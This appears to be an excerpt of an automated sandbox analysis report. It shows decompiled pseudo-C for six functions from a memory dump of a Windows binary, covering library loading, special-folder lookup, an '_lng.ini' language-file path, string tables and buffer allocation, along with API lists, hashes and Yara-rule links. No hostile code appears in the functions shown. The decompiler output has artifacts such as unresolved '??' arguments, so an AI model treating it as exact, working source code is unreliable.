                                                                                                        Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 37%
                                                                                                        			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                                        0x0040ad8c
                                                                                                        0x0040ad93
                                                                                                        0x0040ad95
                                                                                                        0x0040ad9d
                                                                                                        0x0040ada5
                                                                                                        0x0040adb2
                                                                                                        0x0040adb2
                                                                                                        0x0040adb5
                                                                                                        0x0040adbf

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                          • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                        • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                        • String ID: shlwapi.dll
                                                                                                        • API String ID: 4092907564-3792422438
                                                                                                        • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                        • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                        • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                        • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                        0x00406597
                                                                                                        0x00406598
                                                                                                        0x004065a0
                                                                                                        0x004065aa
                                                                                                        0x004065ac
                                                                                                        0x004065ac
                                                                                                        0x004065bd

                                                                                                        APIs
                                                                                                          • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                        • wcsrchr.MSVCRT ref: 004065A0
                                                                                                        • wcscat.MSVCRT ref: 004065B6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileModuleNamewcscatwcsrchr
                                                                                                        • String ID: _lng.ini
                                                                                                        • API String ID: 383090722-1948609170
                                                                                                        • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                        • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                        • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                        • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                        0x0040ac59
                                                                                                        0x0040ac60
                                                                                                        0x0040ac68
                                                                                                        0x0040ac6d
                                                                                                        0x0040ac75
                                                                                                        0x0040ac7b
                                                                                                        0x00000000
                                                                                                        0x0040ac7b
                                                                                                        0x0040ac6d
                                                                                                        0x0040ac80

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                          • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                        • API String ID: 946536540-880857682
                                                                                                        • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                        • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                        • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                        • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                                        0x00406670
                                                                                                        0x0040667a
                                                                                                        0x00406680
                                                                                                        0x00406686
                                                                                                        0x0040668b
                                                                                                        0x0040668d
                                                                                                        0x00406693
                                                                                                        0x00406699
                                                                                                        0x0040669f
                                                                                                        0x004066a9
                                                                                                        0x004066ac
                                                                                                        0x004066af
                                                                                                        0x004066b9
                                                                                                        0x004066c7
                                                                                                        0x004066d9
                                                                                                        0x004066c9
                                                                                                        0x004066c9
                                                                                                        0x004066cc
                                                                                                        0x004066cf
                                                                                                        0x004066d2
                                                                                                        0x004066d5
                                                                                                        0x004066d5
                                                                                                        0x004066db
                                                                                                        0x004066dd
                                                                                                        0x004066e0
                                                                                                        0x004066e8
                                                                                                        0x004066fa
                                                                                                        0x004066ea
                                                                                                        0x004066ea
                                                                                                        0x004066ed
                                                                                                        0x004066f0
                                                                                                        0x004066f3
                                                                                                        0x004066f6
                                                                                                        0x004066f6
                                                                                                        0x004066fc
                                                                                                        0x004066fe
                                                                                                        0x00406701
                                                                                                        0x00406709
                                                                                                        0x0040671b
                                                                                                        0x0040670b
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00406711
                                                                                                        0x00406714
                                                                                                        0x00406717
                                                                                                        0x00406717
                                                                                                        0x0040671d
                                                                                                        0x0040671f
                                                                                                        0x00406722
                                                                                                        0x0040672a
                                                                                                        0x0040673c
                                                                                                        0x0040672c
                                                                                                        0x0040672c
                                                                                                        0x0040672f
                                                                                                        0x00406732
                                                                                                        0x00406735
                                                                                                        0x00406738
                                                                                                        0x00406738
                                                                                                        0x0040673f
                                                                                                        0x00406745

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1860491036-0
                                                                                                        • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                        • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                        • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                        • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                                        0x004054ea
                                                                                                        0x004054ec
                                                                                                        0x004054f1
                                                                                                        0x004054f4
                                                                                                        0x004054f7
                                                                                                        0x004054fa
                                                                                                        0x004054fe
                                                                                                        0x00405501
                                                                                                        0x00405505
                                                                                                        0x00405508
                                                                                                        0x0040550b
                                                                                                        0x0040551b
                                                                                                        0x0040550d
                                                                                                        0x0040550f
                                                                                                        0x0040550f
                                                                                                        0x00405521
                                                                                                        0x00405527
                                                                                                        0x0040552b
                                                                                                        0x0040552e
                                                                                                        0x0040553f
                                                                                                        0x00405530
                                                                                                        0x00405532
                                                                                                        0x00405532
                                                                                                        0x00405556
                                                                                                        0x00405561
                                                                                                        0x0040556e
                                                                                                        0x00405571
                                                                                                        0x00405578
                                                                                                        0x0040557e

                                                                                                        APIs
                                                                                                        • wcslen.MSVCRT ref: 004054EC
                                                                                                        • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                          • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                          • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                          • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                        • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                        • memcpy.MSVCRT ref: 00405556
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 726966127-0
                                                                                                        • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                        • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                        • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                        • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 81%
                                                                                                        			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                                                        0x00405adf
                                                                                                        0x00405ae6
                                                                                                        0x00405af5
                                                                                                        0x00405af6
                                                                                                        0x00405afb
                                                                                                        0x00405b00
                                                                                                        0x00405b0a
                                                                                                        0x00405b18
                                                                                                        0x00405b19
                                                                                                        0x00405b1e
                                                                                                        0x00405b2c
                                                                                                        0x00405b2d
                                                                                                        0x00405b36
                                                                                                        0x00405b37
                                                                                                        0x00405b3c
                                                                                                        0x00405b4a
                                                                                                        0x00405b4b
                                                                                                        0x00405b54
                                                                                                        0x00405b55
                                                                                                        0x00405b5a
                                                                                                        0x00405b68
                                                                                                        0x00405b69
                                                                                                        0x00405b72
                                                                                                        0x00405b73
                                                                                                        0x00405b7b
                                                                                                        0x00000000
                                                                                                        0x00405b7b
                                                                                                        0x00405b80

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1033339047-0
                                                                                                        • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                        • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                        • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                        • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%